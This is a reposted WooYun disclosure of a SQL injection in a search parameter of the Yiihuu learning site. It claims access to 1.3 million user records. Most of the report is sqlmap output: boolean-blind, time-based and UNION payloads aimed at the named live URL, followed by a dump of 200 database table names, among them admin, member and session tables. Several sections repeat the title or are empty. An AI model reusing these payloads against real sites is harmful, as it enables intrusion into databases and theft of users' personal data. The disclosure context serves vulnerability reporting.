神刀安全网

漏洞标题: 翼虎网某处SQL注射漏洞可UNION(130万用户信息)

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域
http://m.yiihuu.com/zyxz/?q=1

漏洞标题:  翼虎网某处SQL注射漏洞可UNION(130万用户信息)

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: q=1%' AND 8567=8567 AND '%'='

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: q=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))qAgp) AND '%'='

Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x587a634b76514a4a6c64,0x71716b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
back-end DBMS: MySQL >= 5.0.0
Database: yiihuu_db
[200 tables]
+-------------------------+
| 360_token |
| activity |
| admin |
| admin_role |
| admin_role_relative |
| advertisement |
| album |
| album_chapter |
| album_copy |
| album_copy_chapter |
| album_count |
| album_extend |
| album_project |
| album_rank_month |
| album_rank_week |
| album_video |
| ask |
| ask_answer |
| ask_content |
| ask_zan |
| attention |
| baidu_push |
| book |
| book_art_tag |
| book_article |
| book_article_ext |
| book_article_temp |
| book_tag |
| business_course |
| business_order |
| card_study |
| chips |
| chips_courses |
| comment |
| comment_att |
| comment_content |
| comment_goodlog |
| comment_reply |
| courses |
| courses_attachment |
| courses_count |
| courses_extend |
| courses_homework |
| courses_homework_attr |
| courses_homework_topic |
| courses_info |
| courses_learn_progress |
| courses_live |
| courses_live_need |
| courses_manage_progress |
| courses_notice |
| courses_payback |
| courses_plan |
| courses_progress |
| courses_push |
| courses_qa |
| courses_qa_fav |
| courses_repay |
| courses_section |
| courses_step |
| courses_step_homework |
| courses_student_test |
| courses_student_work |
| courses_task |
| courses_task_comp |
| courses_test_ext |
| courses_video |
| courses_video_attr |
| coursesapply |
| courseslist |
| download |
| download_class |
| download_count |
| download_ext |
| download_log |
| edu_apply |
| email_count |
| error_reason |
| event_0410 |
| event_0421 |
| event_0509 |
| event_bless |
| event_cj |
| event_gift |
| event_gift_list |
| event_jyj |
| event_jyj_ly |
| event_lhb |
| event_lhb_extend |
| event_org |
| event_org_votelist |
| event_prize |
| event_school_msg |
| event_tejia |
| event_vip_wjdc |
| event_wx_hubi |
| event_wx_lhb |
| event_wx_menucount |
| exp_get |
| exp_op |
| fanc |
| favorites |
| filter_keyword |
| help |
| idear |
| idear_class |
| idear_count |
| idear_downloadlog |
| idear_ext |
| idear_focus |
| idear_sign |
| idearset |
| idearset_count |
| image_content |
| image_count |
| index_show |
| mail_auth |
| mail_notify |
| member |
| member_bind |
| member_bind_token |
| member_extend |
| member_filter |
| member_log |
| member_login_record |
| member_message |
| member_other |
| message |
| message_push |
| meta_custom |
| news |
| news_class |
| news_ext |
| prize |
| prize_recode |
| push_action |
| push_content |
| push_msg_qq |
| quan |
| quan_ext |
| questions |
| questions_class |
| questions_count |
| questions_ext |
| questions_replay |
| questions_replay_ext |
| say |
| say_content |
| say_count |
| say_log |
| search_syn |
| search_word |
| send_mail |
| share |
| sign |
| sign_extend |
| sort_exp |
| sort_level |
| sort_log |
| sort_theme |
| sort_theme_2 |
| sort_tool |
| sort_tool_industry |
| space_focusimg |
| space_friendlink |
| space_group |
| space_member_info |
| space_org_news |
| space_view |
| study |
| subject |
| subject_column |
| subject_soft_content |
| subscribe |
| sucai |
| sucai_class |
| sucai_count |
| sucai_downloadlog |
| sucai_ext |
| sucai_focus |
| sucai_sign |
| sucaiset |
| sucaiset_count |
| sys_message |
| task |
| task_member |
| task_verify_ip |
| tbl_session |
| video |
| video_bigpic |
| video_content |
| video_count |
| words |
| words_rank_month |
| words_rank_week |
| wordsset |
| wordsset_count |
| wordsset_extend |
| wordsset_list |
| wx_keyword |
+-------------------------+

130万用户信息:

漏洞标题:  翼虎网某处SQL注射漏洞可UNION(130万用户信息)

漏洞标题:  翼虎网某处SQL注射漏洞可UNION(130万用户信息)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 翼虎网某处SQL注射漏洞可UNION(130万用户信息)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮